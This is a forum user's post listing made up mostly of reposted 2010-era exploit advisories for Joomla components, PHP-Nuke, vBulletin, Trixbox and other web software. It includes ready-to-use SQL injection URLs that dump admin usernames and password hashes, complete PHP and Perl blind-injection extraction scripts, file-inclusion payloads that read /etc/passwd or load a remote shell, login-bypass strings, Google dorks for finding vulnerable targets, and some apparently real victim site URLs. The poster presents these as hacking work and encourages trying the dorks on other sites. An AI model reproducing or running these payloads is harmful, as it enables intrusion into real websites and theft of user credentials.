spyman

Members
  • Posts: 260
  • Days Won: 4

All posts by spyman

  1. I thought the site you posted was yours lol
  2. Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability ============================================================================== Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// ============================================================================== *************************************************************************** Dork = inurl:com_products "intCategoryId" ########################################################################### ===[ Exploit ]=== => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details or => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details
  3. PhP-Nuke user.php SQL Injection
      ----------------------------Information----------------------------
      +Name : PhP-Nuke user.php SQL Injection
      +Autor : Easy Laster
      +Date : 04.03.2010
      +Script : PhP-Nuke
      +Download : its a old version http://phpnuke.org/
      +Price : 12,00$
      +Language : PHP
      +Discovered by Easy Laster
      +Security Group 4004-Security-Project
      +Greetz to Team-Internet, Underground Agents
      +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,novaca!ne.
      -------------------------------------------------------------------
      +Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname=
      +Exploitable : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select +1,2,version(),4,5,6,7,8,9,10,11,12,13--+
  4. vBulletin Version 3.8.4 File Include Vulnerability
      Security Reason
      Topic : vBulletin Version 3.8.4 File Include Vulnerability
      WLB : WLB-2010030006
      SecurityAlert : None
      Date : 2010-03-02
      Credit : EjRaMHaCKeR
      Added by : EjRaMHaCKeR
      SecurityRisk : Low
      Remote : Yes
      Local : No
      Status : Bogus
      History : [2010-03-02] Started
      Affected software : vBulletin Version 3.8.4
      Text :
      # Script: vBulletin Version 3.8.4 File Include Vulnerability
      # Language: $php$
      # Author : $EjRaM-HaCKeR$
      # My home : [ www.sec-center.com ]
      # Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends # $ EgyptHaCkeR ]
      # mail : m2z@9.cn $ tsv@hotmail.com
      ===[ Exploits ]===
      # 1- http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
      # 2- http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
      $EjRaM-HaCKeR$
  5. Please follow the topic rules; don't spam in the middle of the tutorial.
  6. Omnidocs SQL injection Vulnerability
      Security Reason
      Topic : Omnidocs SQL injection Vulnerability
      SecurityAlert : 7051
      CVE : CVE-2010-0701
      CWE : CWE-89
      SecurityRisk : High
      Remote Exploit : Yes
      Local Exploit : No
      Victim interaction required : No
      Exploit Available : Yes
      Credit : thebluegenius
      Published : 28.02.2010
      Affected Software : newgensoft:omnidocs
      Advisory Content :
      # Exploit Title: Omnidocs SQL injection Vulnerability
      # Date: 10 Feb 2010
      # Author: thebluegenius
      # Software Link: http://www.newgensoft.com/omnidocs.asp
      # Version: All
      # Tested on: Apache-Coyote/1.1 | JBoss
      # CVE : NA
      "Omnidocs" SQL injection vulnerability.
      By : Thebluegenius. Email : rajsm@isac.org.in Blog : thebluegenius.com.
      Description: OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.
      Vulnerability
      Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp
      Command: ' or 'a' = 'a'
      Confirmed SQL Injection error : ORA-00907: missing right parenthesis
      Command: or exists (select 1 from sys.dual) and ''x''=''x'
      Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated
      Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.OrchidSeven.com 4] www.isac.org.in
      This is the last one. If I see any more I'll post them. Saying thanks is much better; that way I know I'm doing my work right.
      Source: ashiyane.org
  7. Trixbox 2.2.4 honecDirectory.php SQL Injection
      Security Reason
      Topic : Trixbox 2.2.4 honecDirectory.php SQL Injection
      SecurityAlert : 7053
      CVE : CVE-2010-0702
      CWE : CWE-89
      SecurityRisk : High
      Remote Exploit : Yes
      Local Exploit : No
      Victim interaction required : No
      Exploit Available : Yes
      Credit : NorSlacker
      Published : 28.02.2010
      Affected Software : fonality:trixbox:2.2.4
      Advisory Content :
      # Exploit Title: Trixbox PhonecDirectory.php SQL Injection
      # Date: 18.02.2010
      # Author: NorSlacker
      # Software Link: http://trixbox.org/downloads
      # Version: 2.2.4
      # Code :
      http://trixbox/cisco/services/PhoneDirectory.php?ID=1 [sql INJECTION]
      Example (Grab users / password hashes from sugarcrm)
      http://trixbox/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
      PhoneDirectory.php vulnerable code:
      # If the variable "ID" is passed in through the GET string, then display
      # extension, phone number and cell phone number for that record with the dial
      # key functionality
      if ($ID) {
          $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
          $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
          $Query .= "FROM contacts WHERE id = '$ID ";
          $Query .= "ORDER BY last_name ";
          $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
          ...
      }
      #norslacker [at] gmail [dot] com
  8. Joomla Component com_liveticker Blind SQL Injection Vulnerability LINK #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ##################################################################### [»] Joomla com_liveticker Remote Blind Injection Vulnerability ##################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com ] [»] Site: [ sec-war.com/cc>] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: [ inurl:index.php?option=com_liveticker "viewticker" ] ###################################################################### ###################################################################### # Joomla com_liveticker (tid) Blind SQL Injection Exploit # [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1" ###################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i 
== 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>
  9. Joomla Component com_yanc SQL Injection Vulnerability LINK ============================================================================== [»] Joomla com_yanc Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ] [»] Dork: [inurl:index.php?option=com_yanc "listid" ] ########################################################################### ===[ Exploit ]=== [»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users-- [»]Author: Snakespc <- ###########################################################################
  10. Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability
      Security Reason
      Topic : Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability
      SecurityAlert : 7043
      CVE : CVE-2010-0694
      CWE : CWE-89
      SecurityRisk : High
      Remote Exploit : Yes
      Local Exploit : No
      Victim interaction required : No
      Exploit Available : No
      Credit : FL0RiX
      Published : 26.02.2010
      Affected Software : percha:com_perchagallery:1.4 and previous versions
      Advisory Content :
      # Joomla Component com_perchagallery SQL Injection Vulnerability
      # Author : FL0RiX
      # Name : com_perchagallery
      # Bug Type : SQL Injection
      # Infection : Admin login credentials can be obtained.
      # Demo Vuln :
      # http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view =editunidad&id=[EXPLOIT]
      # EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/* */from/**/jos_users--
  11. WSC CMS (Bypass) SQL Injection Vulnerability
      Security Reason
      Topic : WSC CMS (Bypass) SQL Injection Vulnerability
      SecurityAlert : 7045
      CVE : CVE-2010-0698
      CWE : CWE-89
      SecurityRisk : High
      Remote Exploit : Yes
      Local Exploit : No
      Victim interaction required : No
      Exploit Available : Yes
      Credit : Phenom
      Published : 26.02.2010
      Affected Software : dynamicsoft:wsc_cms:2.2
      Advisory Content :
      # Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
      # Date: 2010-02-19
      # Author: Phenom
      # Software Link:
      # Version:
      # Tested on: windows xp sp3
      # CVE :
      # Code :
      ############### WSC CMS (Bypass) SQL Injection Vulnerability ###############
      # Author : Phenom
      # mail : sys.phenom.sys[at]gmail[dot]com
      # Dork : Realizzato con WSC CMS by Dynamicsoft
      ####### Exploit #######
      # 1- http://server/public/backoffice
      # 2- login with "admin" as user name and 'or as password
  12. Joomla Component com_hdflvplayer SQL injection exploit #!/usr/bin/perl -w ############################################################################################### # # [~] Joomla Component com_hdflvplayer SQL injection exploit - (id) # [~] Author : kaMtiEz (kamzcrew@yahoo.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : 15 February, 2010 # ############################################################################################### # # [ Software Information ] # # [+] Vendor : http://www.hdflvplayer.net/ # [+] Price : $ 99.00 # [+] Vulnerability : SQL injection # [+] Dork : inurl:"CIHUY" # [+] Type : commercial # ############################################################################################### # # USAGE : perl kaMz.pl # ############################################################################################### print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [~] INDONESIANCODER TEAM [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n"; print "\t\t [~] by kaMtiEz [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; use LWP::UserAgent; print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:"; chomp(my $IBL13Z=<STDIN>); $kaMtiEz="concat(username,0x3a,password)"; $tukulesto="jos_users"; $pathloader="com_hdflvplayer"; $r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n"; $r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $arianom = $IBL13Z . 
"/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$t ukulesto."--"; $gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom)); $contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){ print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n"; } else{print "\n[+] Exploit GAGAL GAN ![+]\n"; }
  13. PBBoard 2.0.5 add administrator and shell upload vulnerabilities
      Security Reason
      Topic : PBBoard 2.0.5 add administrator and shell upload vulnerabilities
      WLB : WLB-2010020135
      SecurityAlert : None
      Date : 2010-02-26
      Credit : indoushka
      SecurityRisk : High
      Remote : Yes
      Local : No
      Status : Bug
      History : [2010-02-26] Started
      Affected software : PBBoard 2.0.5
      Text :
      | # Title : PBBoard Version 2.0.5 Mullti Vulnerability
      | # Author : indoushka
      | # email : indoushka@hotmail.com
      | # Home : www.iq-ty.com
      | # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip
      | # Dork : Powered by PBBoard© 2009 Version 2.0.5
      | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
      | # Bug : Mullti
      ====================== Exploit By indoushka ======================
      # Exploit :
      1- Add Admin: http://127.0.0.1/upload/setup/install/?step=4
      2- upload Vulnerability: After register go to http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&main=1
      After Upload go to 2 find http://127.0.0.1/Upload/download/avatar/(Ev!l name.php)
      Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix
      Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team) www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net www.alkrsan.net * www.kadmiwe.net * www.arhack.net
  14. Joomla 1.5.15 Persistant XSS in 'Author Alias'
      Security Reason
      Topic : Joomla 1.5.15 Persistant XSS in 'Author Alias'
      WLB : WLB-2010020137
      SecurityAlert : None
      Date : 2010-02-26
      Credit : coffey
      Added by : SecurityReason
      SecurityRisk : Low
      Remote : Yes
      Local : No
      Status : Bug
      History : [2010-02-26] Started
      Affected software : Joomla 1.5.15
      Text :
      date : 24.02.2010
      prog : Joomla 1.5.15
      vuln : Persistant XSS in 'Author Alias'
      source : www.joomla.org
      by : coffey
      poc : Persistant XSS in 'Author Alias' when adding new Article (logged only).
      /administrator/index.php?option=com_content&sectionid=0&task=edit&cid[]=46
      $details_created_by_alias="><script>alert(1)</script>
  15. WebAdministrator Lite CMS SQL Injection Vulnerability
      ============ { Ariko-Security - Advisory #5/2/2010 } =============
      SQL injection vulnerability in WebAdministrator Lite CMS
      Vendor's Description of Software: # http://jskinternet.pl/portal/jsk/3/Oferta.html
      Dork: # webadministrator lite
      Application Info: # Name: WebAdministrator Lite CMS # Versions: LITE
      Vulnerability Info: # Type: SQL injection Vulnerability # Risk: medium
      Fix: # N/A
      Time Table:
      # 25/02/2010 - Vendor notified.
      # 25/02/2010 - Vendor response "we will not release FIX for LITE, soon new version"....
      Input passed via the "s" parameter to download.php is not properly sanitised before being used in a SQL query.
      Solution: # Input validation of "s" parameter should be corrected.
      Vulnerability: # http://[site]/download.php?s=[sqli]&id=2324
      Credit: # Discoverd By: MG # Website: http://Ariko-security.com # Contacts: support[-at-]ariko-security.com
      Ariko-Security Maciej Gojny vuln@ariko-security.com tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)
  16. There's this one too, a batch without examples
  17. Title: phpBazar <= 2.1.0 Multiple vulnerabilities
      URL: http://www.smartisoft.com/
      Dork: inurl:classified.php phpbazar
      Exploits:
      -remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
      -access to admin login and password: /admin/admin.php?action=edit_member&value=1
      Example link: http://www.eaa-mauritius.com/phpBaza...member&value=1
      By the way, you can also use the dorks on other sites.
  18. Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability Link view source print? #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ########################################################################### [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability ########################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### ########################################################################### # # Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit # [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 # # ########################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; 
$j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>
  19. Article Friendly <= SQL Injection Vulnerability
      Security Reason
      Topic : Article Friendly <= SQL Injection Vulnerability
      WLB : WLB-2010020122
      SecurityAlert : None
      Date : 2010-02-23
      Credit : SkuLL-HacKeR
      Added by : SecurityReason
      SecurityRisk : Medium
      Remote : Yes
      Local : No
      Status : Bug
      History : [2010-02-23] Started
      Affected software : Article Friendly
      Text :
      ========= [!] Article Friendly <= SQL Injection Vulnerability ==========
      # Author : SkuLL-HacKeR
      # Site p4ge : http://www.articlefriendly.com/
      # GreetZ : AmiZya - Stack - djekmani4ever
      # Dork : Powered by Article DashBoard
      # Sh0w CreW : Jiko HxH - THE SAD HACKER
      # My Home: www.no-exploit.com & wWw.Owned-m.CoM
      # T3st3d on: MacBook & Windows XP SP3
      ===[ #-/Expl0it Code\-# : ]===
      # SQL Injection Vulnerability :
      #-/ Link Admin: www.Target.com/[scriptarticleLoser]/admin/
      #-/ 0r : www.Target.com[script-article-Loser]/admin/index.php?filename=adminlogin
      #-/Username : admin' or 'a'='a
      #-/Password : adminKas0l
      http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
  20. Amelia CMS remote SQL injection
      Security Reason
      Topic : Amelia CMS remote SQL injection
      WLB : WLB-2010020113
      SecurityAlert : None
      Date : 2010-02-23
      Credit : Ariko-Security
      SecurityRisk : Medium
      Remote : Yes
      Local : No
      Status : Bug
      History : [2010-02-23] Started
      Affected software : Amelia CMS
      Text :
      # Title: [sql injection vulnerability in Amelia CMS]
      # Date: [10.02.2010]
      # Author: [Ariko-Security]
      # Software Link: [http://www.ameliadesign.eu/]
      # Version: [ALL]
      # Tested on: [freebsd / ubuntu]
      ============ { Ariko-Security - Advisory #3/2/2010 } =============
      SQL injection vulnerability in Amelia CMS
      Vendors Description of Software: # http://www.ameliadesign.eu/index.php?page=1322&lang=eng&cnt=services
      Dork: # N/A
      Application Info: # Name: Amelia CMS # Versions: ALL
      Vulnerability Info: # Type: SQL injection Vulnerability # Risk: High
      Fix: # N/A
      Time Table # 10/02/2009 - Vendor notified.
      Input passed via the "page" parameter to index.php is not properly sanitised before being used in a SQL query and it is possible to get sensitive information using for example Time-Base Blind SQL Injection attacks.
      Solution: # Input validation of "page" parameter should be corrected.
      Vulnerability: # http://www.[site]/index.php?page=1322[sqli]&lang=eng&cnt=services
      Credit: # Discoverd By: MG # Website: http://Ariko-security.com
      Advisory: #http://www.ariko-security.com/feb2010/ad453.html
      # Contacts: support[-at-]ariko-security.com
  21. Here's the third one
      Core Joomla Community Polls Component 'controller' Parameter Local File Include Vulnerability
      Security Focus
      Bugtraq ID: 38330
      Class: Input Validation Error
      CVE:
      Remote: Yes
      Local: No
      Published: Feb 19 2010 12:00AM
      Updated: Feb 22 2010 04:02PM
      Credit: kaMtiEz
      Vulnerable: Core Joomla Community Polls 1.5.2
      Not Vulnerable: Core Joomla Community Polls 1.5.3
      Attackers can exploit this issue via a browser. The following example URI is available:
      http://www.example.com/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
  22. Here's the second one
      Security Reason
      Topic : The Joomla ACStartSeite component SQL injection vulnerability
      WLB : WLB-2010020103
      SecurityAlert : None
      Date : 2010-02-19
      Credit : AtT4CKxT3rR0r1ST
      SecurityRisk : Medium
      Remote : Yes
      Local : No
      Status : Bug
      History : [2010-02-19] Started
      Affected software : The Joomla ACStartSeite component
      Text :
      Joomla Component com_acstartseite Sql Injection Vulnerability
      .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
      .:. Home : www.sec-attack.com/vb [sec Attack Team]
      .:. Bug Type : Sql Injection[Mysql]
      .:. Dork : inurl:"com_acstartseite"
      ===[ Exploit ]===
      www.site.com/index.php?option=com_acstartseite&Itemid=null[sql]&lan g=de
      www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+unio n+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+mos_users&lang=de
  23. Here's the first batch
  24. Hello. This is for those who are upgrading from 17 to 25; I figured it would be good to have this here. I've posted a batch of bugs on the site and I'm also working out the ways to exploit them. If there is a way, I'll post it and give guidance. My job is the hacking; finding the bugs is up to you.
  25. This gives an error. The full error is this: